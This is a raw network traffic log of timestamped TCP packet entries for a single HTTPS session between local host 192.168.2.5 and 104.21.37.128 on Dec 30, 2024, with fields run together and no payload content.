                                                                                                                                                Dec 30, 2024 18:13:24.142709970 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.142731905 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.142761946 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.142767906 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.142791033 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.142810106 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.229648113 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.229667902 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.229707956 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.229717016 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.229732037 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.229734898 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.229758024 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.229763031 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.229774952 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.229787111 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.229824066 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.230046988 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.230060101 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.230124950 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.230132103 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.230192900 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.230549097 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.230570078 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.230613947 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.230622053 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.230642080 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.230668068 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.230707884 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.230720997 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.230752945 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.230758905 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.230782986 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.230799913 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.230956078 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.230971098 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.231000900 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.231008053 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.231034040 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.231050014 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.231406927 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.231421947 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.231487036 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.231494904 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.231535912 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.231682062 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.231698036 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.231765985 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.231772900 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.231807947 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.255647898 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.318234921 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.318258047 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.318300962 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.318351984 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.318375111 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.318427086 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.320225000 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.320240021 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.320286036 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.320321083 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.320339918 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.320437908 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.320456028 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.320487022 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.320499897 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.320523977 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.320677042 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.320703983 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.320733070 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.320746899 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.320761919 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.320790052 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.321043968 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.321058989 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.321121931 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.321132898 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.321173906 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.321192980 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.321208000 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.321243048 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.321249962 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.321275949 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.321293116 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.321532011 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.321547031 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.321594000 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.321604967 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.321620941 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.321644068 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.321758986 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.321774006 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.321808100 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.321819067 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.321832895 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.321857929 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.406914949 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.406948090 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.407004118 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.407036066 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.407057047 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.407107115 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.408848047 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.408864975 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.408898115 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.408910990 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.408926010 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.408935070 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.408951044 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.408956051 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.408970118 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.408986092 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.409024954 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.409224033 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.409262896 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.409262896 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.409301043 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.409306049 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.409317017 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.409455061 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.409475088 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.409512997 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.409518957 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.409545898 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.409754038 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.409769058 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.409799099 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.409811974 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.409822941 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.410057068 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.410073042 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.410109043 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.410116911 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.410130024 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.410207987 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.410223961 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.410259962 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.410268068 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.410279036 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.495732069 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.495754957 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.495814085 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.495852947 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.495867968 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.497354984 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.497370005 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.497431040 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.497452974 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.497790098 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.497803926 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.497864962 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.497874022 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.499586105 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.499602079 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.499669075 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.499691963 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.500859976 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.500873089 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.500942945 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.500983000 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.501096964 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.501111031 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.501168013 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.501183987 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.501241922 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.501255035 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.501322985 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.501334906 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.501615047 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.501631021 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.501682997 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.501697063 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.584675074 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.584690094 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.584762096 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.584788084 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.586532116 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.586544991 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.586600065 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.586617947 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.586992979 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.587007046 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.587053061 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.587073088 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.587085962 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.587342978 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.587358952 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.587423086 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.587434053 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.587626934 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.587639093 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.587683916 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.587693930 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.587704897 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.588103056 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.588115931 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.588186979 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.588198900 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.588555098 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.588567972 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.588633060 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.588644981 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.590372086 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.590385914 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.590435028 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.590462923 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.590476036 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.628053904 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.674020052 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.674038887 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.674089909 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.674114943 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.674133062 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.674560070 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.674577951 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.674619913 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.674628019 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.674652100 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.675241947 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.675256968 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.675308943 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.675335884 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.675348997 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.675354958 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.675369978 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.675398111 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.675405979 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.675431967 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.675555944 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.675575972 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.675610065 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.675621033 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.675646067 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.675781012 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.675797939 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.675828934 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.675841093 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.675854921 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.675956964 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.675970078 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.676008940 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.676017046 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.677732944 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.677758932 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.677793980 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.677809954 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.677825928 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.741445065 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.757354021 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.792073011 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.792088985 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.792162895 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.792191029 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.792248011 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.795365095 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.796655893 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.796670914 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.796753883 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.796786070 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.796789885 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.796813011 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.796828032 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.796960115 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.796978951 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.796989918 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.797046900 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.797048092 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.797055006 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.797064066 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.797086000 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.797111034 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.797116995 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.797143936 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.797266960 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.797281027 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.797346115 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.797353029 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.797411919 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.797431946 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.797503948 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.797503948 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.797509909 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.797583103 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.797596931 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.797674894 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.797683001 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.799993038 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.880728006 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.880744934 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.880811930 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.880836010 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.885195017 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.885210991 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.885279894 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.885288954 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.885456085 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.885469913 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.885540009 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.885546923 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.885653019 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.885669947 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.885739088 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.885739088 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:24.885747910 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.885802984 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:24.885816097 CET44349720104.21.37.128192.168.2.5
